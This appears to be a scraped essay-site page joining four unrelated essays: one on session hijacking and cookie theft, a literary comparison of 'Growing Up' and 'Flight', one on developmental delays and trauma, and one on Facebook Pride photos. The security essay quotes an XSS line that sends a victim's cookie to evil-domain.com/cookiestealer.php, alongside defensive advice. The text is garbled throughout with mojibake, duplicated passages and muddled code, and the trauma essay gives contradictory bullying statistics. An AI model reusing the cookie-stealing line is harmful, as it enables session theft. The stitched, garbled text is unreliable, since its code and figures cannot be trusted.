Study And Analysis On Session Hijacking Computer Science Essay

Study And Analysis On Session Hijacking Computer Science Essay Generally the most common way of tracking a user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out. Introduction: Session hijacking term means the exploitation of presently running session. Sometimes it is often referred as session key, it is used to gain the unauthorized gain to a system or to exploit services in the a computer. When a magic cookie which is used to authenticate the user to the server is stolen and used for the unauthorized purse is referred as session hijacking. Generally it is relevant to the web developers, as HTTP cookies are used to maintain the session on a site can be easily stolen by an attacker or the attacker can utilize by gaining access to the computer where the he can find the saved cookies. Cookie: When the user runs a machine, the machine stores a small text file which is called as a cookie. Cookies are plain text, they do not contain any executable codes A web page or sever instructs a particular browser to store the information and sent it back whenever there is a request based on certain rules. Majority of sites identifies the users by these cookies. A user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out. Session hijacking in TCP In the session hijacking in TCP, the attacker takes over the TCP session between the two computers. As the most of the authentication is done at the starting of the session, this allows the hacker to gain over the machines. One of the common methods used is source- routed of IP packets. It is generally middle in the middle kind of a attack, where a hacker a point B intercepts the conversation between the A and C by encouraging the packets to pass through the attackers machine. Even though the source routing is turned off, the attacker can use a method called blind hijacking, where the attacker tries to guess the response between the two machines. If he is successful, then the hacker sends a command but he can never see the response but however a common command is like password, which allows to access from some other place on the network. One of the purposes of such an attack is to cause the denial of service attack at one end point so that it will not respond. This attack can force the machine to crash or it can force the network connection for heavy packet loss. Problem: The main problem with this kind of a system is that it leaves the user identification at a single data point and more over the cookies sent over the internet is in the form of plain text, which makes it to highly vulnerable to packet sniffing, where hacker intercepts the conversation between the network and the computer. One the user login cookie is stolen; it can be used to run the similar session at a distinct place by manually setting the cookie. Because the server canà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢t differentiate between a original cookie and a duplicated cookie which was modified by the attacker through the packet sniffing, so it shows as if the user is logged on. This type of attack is generally referred as session hijacking. To prevent session hijacking using cookies there are few methods. The first one is, sending the cookies over the SSL; this is a common method technique. SSL uses the encryption method for the request on the site before responding across the internet and cookie value cannot be solely determined by the sniffing. The banks and stores generally use this method frequently since most of the session is for short duration of time. Another method is to generate the session key randomly or which is based on the information of the user such as login id, IP address, and time when he logged in etc. It makes the session key un- usable, though it is possible. The other way is to revalidate the particular user before performing assigned to a higher security level, such as, many sites as for login information for the second time before modifying the password. Cookies in JavaScript Creating, removing and manipulation of cookies can be done in JavaScript by using document. cookie property. This property behaves as a set cookie header when it is assigned to a cookie header. While creating a cookie, string must be used in the same format. You can create, manipulate, and remove cookies in JavaScript by using the document.cookie property. This property acts as the Set-Cookie header when assigned to and as the Cookie header when read from. When creating a cookie, you must use a string thatà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢s in the same format that Set-Cookie expects: document.cookie=name=prahald; domain=nczonline.net; path=/; just by modifying the values of document.cookie does not delete the cookie. It just either creates or modifies the particular string. So that whenever the next request is made to the server, these cookies are sent along the set cookie. To retrieve cookie values in JavaScript, just read from the document.cookie property. The returned string is in the same format as the Cookie header value, so multiple cookies are separated by a semicolon and space. Example: name1=Munn; name2=prahalad This is the reason why, we need to compulsory make a cookie string manually as an original cookie Cookie stealing and XSS To able to load JavaScript from a distinct domain onto a page opens up at a particular week point or security loop holes. In fact a request from a third party, the JavaScript doesnà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢t include the cookies containing in a page. The JavaScript can get access to all of them. All the script page are considered as, running on a common platform. With the similar path, and by using the similar protocol as the page. This means a script form loaded in other domain page by reading the cookie as cookie. Document. For example, it can be dangerous , if a person lodes a script from evil-domain.com which consists of some useful codes. However, users at evil-domain.com can switch that code to the following: (new Image()).src = http://www.evil-domain.com/cookiestealer.php?cookie= + cookie.domain; As this code is being loaded on to the user page, without being recognized by user send users cookie to the evil-domain.com. This problem happens to each and every person who visits the site. Once the hacker has the user cookie, it is very easy to penetrate and doing other attacks including the session hijacking. Whenever attack happens due to injection of third-party JavaScript into a page, it is referred as cross-site scripting attack or it is generally referred as XSS. Cookie theft doesà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢nt occur by just injecting a malicious scrip onto your page accidentally, it can also happen due to poor input filtering. Such as a page, where the user can enter the text, which is the output, onto the page. If the text consists of a script tag with the similar code as mentioned above then it is possible to steal the cookies The cross site scripting attack has been used against large sites for example, live journal and MySpace. The best way to protect is of forms: Never ever include the JavaScript for sites or domains which are untrusted. The CDNs of big companies like yahoo,AOL and Google should be more secure; using best precaution which includes other locations. From all the user input the HTML should be filtered out. You should not accept any user input and outbound onto a page without filtering it. Conclusion Hence it is safe to use cookies which all the security issues around them. That is why HTTP cookies are considered as important over the standard cookies implementations. If a cookie is marked as HTTP, a attacker cannot inject or get access to the malicious script by cookie via document. So it becomes difficult to steal the cookies. When such a HTTP cookies are supported by the browsers it becomes a third option.

Compare the ways in which the authors present the main characters “Growing Up” and “Flight” as learning something new

The two stories are very similar in many ways. Both are about learning new things and the changing attitudes between the old and the young. Also the main learners in both stories are the older generation. In Flight it is the Grandfather while in Flight it is Robert Quick. Also in both stories the secondary learners are the younger generation Jenny in Growing Up and the mother of the younger generations seem to have already learned and accepted the lessons. However there is a slight difference I feel that in â€Å"Flight† it is more about accepting new concepts than about learning. In flight the first thing Quick realizes is that his daughters have grown up, he realizes this due to their lack of response to him and their lack of affection. This is how in lines 4 to 6 â€Å"He had hoped indeed that they might, as often before, been waiting at the corner of the road† and in line 25 to 26 â€Å"He shouted ‘Hullo, hullo, children.' There was no reply. And he stopped, in surprise.† He expects the children to be the same as they were when they were younger but they have changed. This is also shown from lines 34 to 49 where the children are very unresponsive towards their father, Jenny answers by having â€Å"peered at him through her hair† and a â€Å"slight wiggle of her behind† and Kate answers him only by â€Å"faint, muffled†¦ ‘Hullo'†. The Grandfather in Flight learns that his granddaughter has grown up as well in lines 116 and in lines 119 to 122 what makes him realize this is their â€Å"grown up seriousness†. The author shows this by contrasting the grand father being â€Å"shut-out† by their â€Å"grown up seriousness† while they are â€Å"tumbling like puppies on the grass†. This contrast shows that although they appear to be the same the grandfather has learnt that inside his granddaughter has changed. Mr. Quick also learns that his daughters can be hurtful and learns not to have fixed expectations of them. He learns of their hurtful ness in lines 75 to 105 when the girls first torture snort and then begin to attack him. But he then learns not to have fixed expectations of them when shortly after that in lines 125 to 136 they then begin to take care of him and nurse his wounds. A similar thing happens in Flight when the granddaughter first taunts her grandfather in lines 47 to 51, but then later 103 to 105 bring him a present as a peace offering showing him not to have fixed expectations either. Both the granddaughter in Flight and Jenny in Growing Up also learn something new by the end of the stories. The granddaughter realizes that her grandfather does not wish to spite her (as it seems in lines25 to 39) and is only trying to prevent her from getting married because he truly loves her, and he does not wish her to be unhappy. The author has presented this at the very end of the play, so that it has a lingering effect on the reader. Doris Lessing shows this not by any words but by an action, namely when the grandfather releases the birds (which have been made to symbolize the granddaughter) free in lines126 to 145, symbolizing setting his granddaughter free to do as she pleases. In turn she realizes this and reacts to it and is said to be having â€Å"tears run shivering off her face† showing the profound impact it has on her. Joyce Cary author of growing up also shows Jenny's new understanding at the end of the story. He leaves the reader with a sense of uncertainty concerning Jenny, unsure as to what exactly she is thinking, leaving it at â€Å"she also was struck by something new and unexpected†. I believe that Jenny gained a new understanding of Quick, perhaps one of vulnerability. This is perhaps due to the fact that quick towards the end is shown as fearing his children. In lines 174 to 175 he is shown as unsure what to think of what Jenny was doing, which may be the base of her new understanding Another similarity between the stories upon comparison is the resemblance in the roles of the Daughter in Flight and Mrs. Quick in Growing Up. The authors of both stories show them as being superior and show them as already understanding what the other characters are yet to learn. In Growing Up when Mr. Quick tells Mrs. Quick about the events of the day which have shocked him she merely replies â€Å"All you children- amusing her selves while we run the world.† As if the events were perfectly normal and natural, because she already knows to expect it. The same is true for the Daughter in Flight she too shows that she understands both sides and knows what to expect when she converses with her father in lines 75 to 100 when she appears to have al the answers to the grandfather's questions. Both stories have a lot in common in the way the authors present the way in which the characters learn new things. This is especially true in terms of structure where the layout is close to identical. Though both stories seem to be about different themes they are very similar in comparison.

Developmental Delays and Trauma Essay

Developmental delays is when your child does not reach their developmental milestones at the projected times. It is an ongoing major or minor delay in the course of development. Developmental delays can have many different causes. There are many types of Developmental delays in children; they include problems with language or speech, vision, movement (motor skills), social, emotional and cognitive skills (van der Kolk, 1995). Developmental delays are easily distinguished if you pay close attention to the development and milestone periods contained by children; for example if you notice a child having a low attention span, they can’t stay still, they’re highly active and energetic all the time, that’s perhaps due to attention-deficit hyperactivity disorder, known as ADHD. There are so many different things that can cause developmental delays and children aren’t always born with developmental delays. Although, developmental delays can be genetic or born with , there are times when trauma at different ages can cause developmental delays such as a child being abused and suffering brain trauma, concussion, which could cause memory lost. Or there could be an accident and a child or adult undergo serious injuries to the spine, eyes, etc. Spinal injuries can be of damage to you motor skills. Spinal injuries or brain injuries if serious can lead to you basically having to start over as if you were a baby learning to walk, read, jump, or talk. The Shaken baby syndrome also can be a trauma that can cause brain injuries. There are numerous of things that have major components to play in developmental delays. Trauma definitely plays a one of those major parts in developmental delays. There are a number of Trauma’s that can cause development delays. It doesn’t always have to be abuse or accidents. Trauma can be caused by divorce, neglect, bullying, sports injuries, or even bad relationship breaks up. These types of trauma are called psychological trauma. Psychological  traumas effects are mostly emotional and it isn’t always permanent. Psychological trauma causes anger, irritability; mood swings, guilt, hopeless, anxiety, withdrawing, and disconnected to name a few. For divorce, Feldman says (2011) ch ildren and adults may experience depression, and disturbances and phobias and these things last from 6 months up until 2 years. Feldman states children whose parents are divorcing blames themselves for the breakup. He also states, evidence shows that twice as many children of divorced parents enter psychological counseling (Feldman, 2011). Children under the age 18 suffer 40% more anxiety as a result of divorce (van der Kolk, 1995). About 10-15 percent of students are bullied one time or the other (Feldman, 2011) and almost 85% of girls and 80% of boys are being bullied (Feldman, 2011). Those who are bullied lack social skills, cry easy (Feldman, 2011), and they experience depression, stress, anger, etc. Prayer and meditation help brain activity. Mediation to the mind is like an aerobic exercise to the body. Studies have also shown that meditation promotes mindfulness, decreased stress, insomnia, illnesses, depression, anxiety and panic. Spiritual connection brings comfort and healing to trauma. Researchers are learning the parts of the brain that are responsible for the spiritual thoughts, prayer and meditation. In one of our presentations his week, Dr. Jeanne Brooks stated that we have a spir itual part in our brain (2014). There are good and bad parts to everyone, I believe the good part is the spiritual part in everyone. For example, we’ve all seen cartoons in which there was a devil on one shoulder and an angel on the other. The shoulder with the angel is the part of us, the part of our brain or conscious that’s spiritual. References Brooks, Jeanne Dr. â€Å"Divorce and Stress† video presentation. LUO (2014) Feldman, R.S. (2014). Development across the Life Span (7th edition) Namka,, L. (2001). Children who are traumatized by bullying. alk, Trust and Feel Therapeutics., p. 18. Van Der Kolk, an der Kolk, B. (1995). developmental trauma disorder : Towards a rational diagnosis for children with complex trauma histories.

What Do Those Facebook Pride Photos Really Mean

On June 26, 2015 the U.S Supreme Court ruled that denying people the right to marry on the basis of sexual orientation is unconstitutional. That same day, Facebook debuted an easy-to-use tool that turns ones profile picture into a rainbow flag-styled celebration of gay pride. Just four days later, 26 million of the sites users had adopted the Celebrate Pride profile picture. What does it mean? In a basic, and rather obvious sense, adopting the gay pride profile picture demonstrates support for gay rights--it signals that the user espouses particular values and principles, which in this case, are attached to a particular civil rights movement. This can signal membership in that movement, or that one considers oneself an ally to those the movement represents.  But from a sociological standpoint, we can also see this phenomenon as the result of implicit peer pressure. A Facebook-produced study of what caused users to change their profile picture to the equal sign associated with the Human Rights Campaign in 2013 proves just this. By studying user-generated data collected via the site, Facebook researchers found that people were most likely to change their profile picture to the equal sign after seeing several others in their network do so. This outweighed other factors like political attitudes, religion, and age, which makes sense, for a few reasons. First, we tend to self-select into social networks in which our values and beliefs are shared. So in this sense, changing ones profile picture is a way to reaffirm those shared values and beliefs. Second, and related to the first, as members of a society, we are socialized from birth to follow the norms and trends of our social groups. We do this because our acceptance by others and our very membership in society is premised on doing so. So, when we see a particular behavior emerge as a norm within a social group of which we are a part, we are likely to adopt it because we come to view it as expected behavior. This is easily observed with trends in clothing and accessories, and seems to have been the case with the equal sign profile pictures, as well as the trend of celebrating pride via a Facebook tool. In terms of achieving equality for LGBTQ people, that the public expression of support for their equality has become a social norm is a very positive thing, and its not just on Facebook that this is happening. Pew Research Center reported in 2014 that 54 percent of those polled supported same-sex marriage, while the number in opposition had dropped to 39 percent. The results of this poll and the recent Facebook trend are positive signs for those fighting for equality because our society is a reflection of our social norms, so if supporting gay marriage is normative, then a society that reflects those values in practice should follow. However, we must be cautious about over-reading the promise of equality into a Facebook trend. There is often quite a gulf between the values and beliefs we publicly express and the practice of our everyday lives. While it is now normal to express support for gay marriage and equality for LGBTQ people in the greater sense, we nonetheless still carry around within us socialized biases--both conscious and subconscious--that favor heterosexual couplings over homosexual ones, and gender identities that correspond to still quite rigid behavioral social norms that are expected to correspond with biological sex (or, hegemonic masculinity and femininity). We have even more work to do to normalize the existence of gender queer and trans* people. So if, like me, you changed your picture to reflect gay and queer pride or your support of it, keep in mind that judicial decisions do not an equal society make. The rampant persistence of systemic racism five decades after the Civil Rights Act was passed is a disturbing testament to this. And, the fight for equality--which is about much more than marriage--must also be fought offline, in our personal relationships, educational institutions, hiring practices, in our parenting, and in our politics, if we want to really achieve it.